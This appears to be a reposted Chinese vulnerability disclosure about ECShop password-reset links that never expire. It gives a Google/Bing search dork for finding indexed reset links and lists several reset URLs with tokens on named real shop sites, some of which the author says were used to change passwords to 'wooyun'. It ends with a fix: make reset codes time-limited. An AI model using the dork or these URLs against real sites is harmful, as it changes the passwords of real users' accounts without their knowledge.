ECShop找回密码功能设计缺陷,修改密码链接没有时效性
可通过搜索引擎搜索关键词 来重置ecshop网站上的部分用户的密码 只是不知道用户名无法登陆,只能盲改密码 谷歌
inurl:user.php?act=get_password&uid=
打开一个链接:
http://class.enfamily.cn/user.php?act=get_password&uid=277576&code=09d77a40ca80fdfbd33315131e554bb0
随便输入密码 例如:wooyun
已经修改成功,只是不知道用户名无法登陆。 其他搜索引擎 通过bing.com搜索关键词:user.php?act=get_password&uid=
找几个例子
http://www.yofus.com/user.php?act=get_password&uid=666167&code=e32d1180abe40484c2c3743e2393e5b0密码同样改为wooyun
http://www.ziai168.com/user.php?act=get_password&uid=9086&code=f19cea38ba7af425a8d3eea5a0c4beb4
http://shop.careland.com.cn/user.php?act=get_password&uid=9163183&code=cad8dd2c08a321666e0da6a5bcc56e85
修复方案:
对修改密码的code设置一个时效性。
查看更多关于ECShop任意用户密码盲改漏洞 - 网站安全 - 自学p的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15256